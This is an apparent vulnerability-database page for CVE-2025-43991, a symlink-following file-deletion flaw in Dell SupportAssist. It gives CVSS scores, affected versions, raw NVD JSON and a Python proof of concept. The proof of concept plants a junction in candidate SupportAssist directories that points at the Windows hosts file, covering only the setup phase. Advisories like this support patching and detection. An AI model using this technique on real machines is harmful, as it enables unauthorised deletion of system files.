Security Vulnerability Report
CVE-2025-43991 CVSS 6.3 MEDIUM

CVE-2025-43991

Published: 2025-10-13 15:16:04
Last Modified: 2025-11-04 15:24:24

Description

SupportAssist for Home PCs versions 4.8.2 and prior and SupportAssist for Business PCs versions 4.5.3 and prior contain a UNIX Symbolic Link (Symlink) Following vulnerability. A low-privileged attacker with local access to the system could potentially exploit this vulnerability to delete arbitrary files, on the affected system only.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
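CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H (Secondary assessment; the raw record below also carries a Primary assessment of CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H, base score 7.1 HIGH)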

Configurations (Affected Products)

cpe:2.3:a:dell:supportassist_for_business_pcs:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:supportassist_for_home_pcs:*:*:*:*:*:*:*:* - VULNERABLE
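Dell SupportAssist for Home PCs <= 4.8.2 (CPE match data below: versions before 4.8.2.29006)
Dell SupportAssist for Business PCs <= 4.5.3 (CPE match data below: versions before 4.5.3.25254)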

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
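#!/usr/bin/env python3
# CVE-2025-43991 - Dell SupportAssist Symlink Following Vulnerability PoC
# This PoC demonstrates the concept of exploiting a symlink following vulnerability
# in Dell SupportAssist to delete arbitrary files on the system.
#
# Reviewer context (defensive):
#   - The CPE data on this page lists SupportAssist for Business PCs before
#     4.5.3.25254 and SupportAssist for Home PCs before 4.8.2.29006 as
#     vulnerable; the vendor advisory referenced is DSA-2025-362. Updating past
#     those builds is the remediation.
#   - The weakness is CWE-61: a privileged process deletes a path that a
#     less-privileged user was able to replace with a link.
#   - For detection, the observable is a link or junction appearing inside a
#     directory that a privileged service cleans up, followed by a delete
#     performed by that service outside its own directory tree.
#   - NOTE(review): nothing on this page shows that the directories or file
#     names below were validated against the product; treat them as
#     illustrative placeholders chosen by the PoC author.

import os
import sys
import tempfile
import ctypes
import shutil


def is_admin():
    """Report whether the current process is an administrator.

    Returns:
        bool: True when ``IsUserAnAdmin`` returns non-zero. Any exception
        (including ``ctypes.windll`` being absent off Windows) yields False.
    """
    try:
        return ctypes.windll.shell32.IsUserAnAdmin() != 0
    except Exception:
        # Best-effort probe: a failed lookup is treated as "not admin".
        return False


def create_malicious_symlink(target_file, link_location):
    """Create a link at ``link_location`` that points to ``target_file``.

    On Windows (``sys.platform == 'win32'``) the link is made by running
    ``mklink /J`` through ``os.system``; elsewhere ``os.symlink`` is used.

    An entry already present at ``link_location`` is removed first. Files and
    symlinks are removed with ``os.remove``. A directory is removed with
    ``os.rmdir``, which never recurses: a non-empty real directory is left
    untouched and the call fails instead of deleting its contents.

    Args:
        target_file: Path the new link should point to.
        link_location: Path at which the link is created.

    Returns:
        bool: True when the link was created, False on any failure (the
        reason is printed).
    """
    try:
        # Remove existing link if present
        if os.path.exists(link_location) or os.path.islink(link_location):
            if os.path.isdir(link_location) and not os.path.islink(link_location):
                # os.rmdir removes an empty directory or a junction entry
                # itself. A non-empty real directory raises OSError, which is
                # reported by the handler below rather than being wiped
                # recursively by the test tool.
                os.rmdir(link_location)
            else:
                os.remove(link_location)

        # On Windows, create a directory junction (requires no special privileges)
        if sys.platform == 'win32':
            # Use mklink /J for directory junction
            cmd = f'mklink /J "{link_location}" "{target_file}"'
            result = os.system(cmd)
            if result == 0:
                print(f"[+] Directory junction created: {link_location} -> {target_file}")
                return True
            else:
                print(f"[-] Failed to create junction. Error code: {result}")
                return False
        else:
            # On Unix-like systems, use os.symlink
            os.symlink(target_file, link_location)
            print(f"[+] Symbolic link created: {link_location} -> {target_file}")
            return True
    except Exception as e:
        print(f"[-] Error creating symlink: {e}")
        return False


def exploit():
    """Run the setup phase of the demonstration and print its progress.

    What the code does:
        1. Picks the first existing directory from a hard-coded candidate
           list, or creates a fresh temporary directory when none exists.
        2. Creates a link named ``cleanup_target.tmp`` in that directory,
           pointing at the first entry of ``target_files``.

    The script does not trigger or wait for any SupportAssist operation; the
    deletion described in the printed messages is not performed here.
    """
    print("=" * 60)
    print("CVE-2025-43991 - Dell SupportAssist Symlink Following PoC")
    print("=" * 60)

    # NOTE(review): the advisory on this page rates the issue PR:L (low
    # privileges); this warning comes from the PoC author and does not
    # reflect a requirement stated in the advisory.
    if not is_admin():
        print("[!] Warning: Running without admin privileges.")
        print("[!] Some operations may fail. Run as admin for full effect.")

    # Common SupportAssist temp/working directories
    # NOTE(review): candidate paths only; not confirmed by the advisory.
    supportassist_dirs = [
        os.path.join(tempfile.gettempdir(), 'SupportAssist'),
        os.path.join(tempfile.gettempdir(),'Dell', 'SupportAssist'),
        'C:\\ProgramData\\Dell\\SupportAssist',
        'C:\\ProgramData\\SupportAssist',
        os.path.expanduser('~\\AppData\\Local\\Dell\\SupportAssist'),
    ]

    # Target critical files that would cause system instability if deleted
    # (These are examples - actual targets depend on attacker's goals)
    target_files = [
        'C:\\Windows\\System32\\drivers\\etc\\hosts',
        'C:\\ProgramData\\Dell\\SupportAssist\\logs\\supportassist.log',
        'C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Dell\\SupportAssist\\temp_data.tmp',
    ]

    # Step 1: Find or create a writable directory where SupportAssist operates
    # Only existence is checked here; writability is not tested.
    target_dir = None
    for sa_dir in supportassist_dirs:
        if os.path.exists(sa_dir):
            target_dir = sa_dir
            print(f"[+] Found SupportAssist directory: {target_dir}")
            break

    if target_dir is None:
        # Fallback: use temp directory
        target_dir = tempfile.mkdtemp(prefix='sa_exploit_')
        print(f"[*] SupportAssist dir not found, using: {target_dir}")

    # Step 2: Create malicious symlink pointing to target file
    target_file = target_files[0]  # Use first target as example
    link_name = os.path.join(target_dir, 'cleanup_target.tmp')

    print(f"\n[*] Target file to delete: {target_file}")
    print(f"[*] Symlink location: {link_name}")

    if create_malicious_symlink(target_file, link_name):
        print("\n[+] Symlink successfully planted!")
        print("[*] Waiting for SupportAssist cleanup operation...")
        print("[*] When SupportAssist deletes 'cleanup_target.tmp',")
        print("[*] it will follow the symlink and delete the target file instead.")
        print("\n[!] NOTE: This PoC only demonstrates the setup phase.")
        print("[!] Actual exploitation requires triggering SupportAssist")
        print("[!] to perform a cleanup operation on the planted symlink.")
    else:
        print("[-] Failed to plant symlink. Exploit aborted.")


if __name__ == '__main__':
    exploit()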

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43991", "sourceIdentifier": "[email protected]", "published": "2025-10-13T15:16:04.267", "lastModified": "2025-11-04T15:24:24.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SupportAssist for Home PCs versions 4.8.2 and prior and SupportAssist for Business PCs versions 4.5.3 and prior, contain an UNIX Symbolic Link (Symlink) following vulnerability. A low privileged attacker with local access to the system could potentially exploit this vulnerability to delete arbitrary files only in that affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:supportassist_for_business_pcs:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.3.25254", "matchCriteriaId": "9831B6C9-0619-4B5A-9985-9DA11E36E9C8"}, {"vulnerable": true, "criteria": 
"cpe:2.3:a:dell:supportassist_for_home_pcs:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.8.2.29006", "matchCriteriaId": "6BD98898-301B-460B-9A13-3F6C904CF98C"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000378367/dsa-2025-362-security-update-for-dell-supportassist-for-home-pcs-and-dell-supportassist-for-business-pcs-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}